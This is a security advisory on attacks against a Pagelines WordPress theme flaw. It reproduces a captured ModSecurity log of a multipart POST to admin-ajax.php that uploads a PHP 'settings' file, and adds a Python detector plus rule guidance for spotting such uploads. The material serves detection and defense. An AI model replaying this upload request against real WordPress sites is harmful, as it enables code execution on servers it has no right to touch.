Attacks in Pagelines for WordPress themes


Over the last few days we have seen a large number of attacks against an old vulnerability in the Pagelines WordPress themes. Sucuri disclosed the Pagelines vulnerability in January 2015.

Technical Details

Any website running a vulnerable version of the Platform theme (< 1.4.4) is at risk of privilege escalation and remote code execution.

ModSecurity audit log and payload

[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 37930 80
POST /wp-admin/admin-ajax.php HTTP/1.1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Connection: close, Te
Accept: */*
Te: trailers
Accept-language: en-US;q=0.8,en;q=0.6
Accept-encoding: gzip, deflate
Content-length: 398
Content-type: multipart/form-data; boundary=xYzZY

Here is the POST data (the multipart boundary lines are omitted in the log excerpt; the boundary is xYzZY, as named in the Content-type header above):

Content-Disposition: form-data; name="page"

Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

< ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
Content-Disposition: form-data; name="action"

Content-Disposition: form-data; name="settings_upload"
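The captured body is what a detection rule has to key on: a multipart POST to wp-admin/admin-ajax.php that carries a Pagelines settings-import field (settings_upload) together with a "settings file" whose content is PHP. The following is an added example, not code from the original post or from Sucuri or Pagelines: a small offline detector that parses a multipart/form-data body laid out exactly like the captured one and reports those indicators. The sample request inside it is reconstructed from the log above with the boundary xYzZY; the page, action and settings_upload fields are kept empty because the log excerpt shows no values for them, so the detector keys on field presence rather than value. The function and constant names are my own.

```python
"""Detect Pagelines-style PHP "settings" uploads in multipart POST bodies.

Added example (not the blog's or the theme's own code). The sample request
below is constructed from the audit log in the post; field values that the
log does not show are left empty.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators: a PHP open tag in the uploaded content, an executable extension
# on the uploaded file name, and the Pagelines settings-import field name.
PHP_OPEN = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
SUSPICIOUS_EXT = (".php", ".phtml", ".php5", ".phar")
PAGELINES_FLAG_FIELDS = {"settings_upload"}


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    body: bytes


def _disp_param(disposition: str, key: str) -> Optional[str]:
    """Pull name="..." / filename="..." out of a Content-Disposition header."""
    m = re.search(r'(?:^|;)\s*' + key + r'="([^"]*)"', disposition)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal RFC 2046 multipart splitter (CRLF line endings, as on the wire)."""
    delim = b"\r\n--" + boundary.encode()
    parts: List[Part] = []
    # Prefix a CRLF so the first delimiter is matched like every later one.
    for seg in (b"\r\n" + body).split(delim)[1:]:
        if seg.startswith(b"--"):      # closing delimiter "--boundary--"
            break
        if seg.startswith(b"\r\n"):
            seg = seg[2:]
        head, _, data = seg.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            k, _, v = line.partition(b":")
            headers[k.strip().lower().decode()] = v.strip().decode(errors="replace")
        disp = headers.get("content-disposition", "")
        parts.append(Part(_disp_param(disp, "name") or "",
                          _disp_param(disp, "filename"),
                          headers.get("content-type"), data))
    return parts


def inspect_request(method: str, path: str, content_type: str, body: bytes) -> List[str]:
    """Return human-readable findings for one request; empty list means clean."""
    findings: List[str] = []
    if method != "POST" or not path.startswith("/wp-admin/admin-ajax.php"):
        return findings
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return findings
    parts = parse_multipart(body, m.group(2))
    flagged = {p.name for p in parts} & PAGELINES_FLAG_FIELDS
    if flagged:
        findings.append("pagelines settings import field present: " + ", ".join(sorted(flagged)))
    for p in parts:
        if not p.filename:
            continue
        if p.filename.lower().endswith(SUSPICIOUS_EXT):
            findings.append(f"upload {p.filename!r} has executable extension")
        if PHP_OPEN.search(p.body):
            findings.append(f"upload {p.filename!r} contains a PHP open tag")
    return findings


def is_attack(findings: List[str]) -> bool:
    """Treat it as an attack only when a PHP indicator accompanies the import field."""
    return any("settings import field" in f for f in findings) and \
        any("PHP open tag" in f or "executable extension" in f for f in findings)


# Constructed sample: the captured POST body rebuilt with boundary xYzZY.
SAMPLE_CT = "multipart/form-data; boundary=xYzZY"
SAMPLE_BODY = (
    b'--xYzZY\r\nContent-Disposition: form-data; name="page"\r\n\r\n\r\n'
    b'--xYzZY\r\nContent-Disposition: form-data; name="file"; filename="settings.php"\r\n'
    b'Content-Type: text/plain\r\n\r\n'
    b"<?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>\r\n"
    b'--xYzZY\r\nContent-Disposition: form-data; name="action"\r\n\r\n\r\n'
    b'--xYzZY\r\nContent-Disposition: form-data; name="settings_upload"\r\n\r\n\r\n'
    b'--xYzZY--\r\n'
)


def scan_sample() -> List[str]:
    return inspect_request("POST", "/wp-admin/admin-ajax.php", SAMPLE_CT, SAMPLE_BODY)


if __name__ == "__main__":
    for f in scan_sample():
        print("[!]", f)
    print("attack" if is_attack(scan_sample()) else "clean")
```

The same three conditions (request path, the settings_upload field name, and PHP content or a .php file name in the upload) are what a ModSecurity rule would test against REQUEST_FILENAME, ARGS_NAMES and the FILES / FILES_NAMES collections; checking the content rather than only the extension matters because a "settings" import does not need a .php name to be written out as code.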


Final words

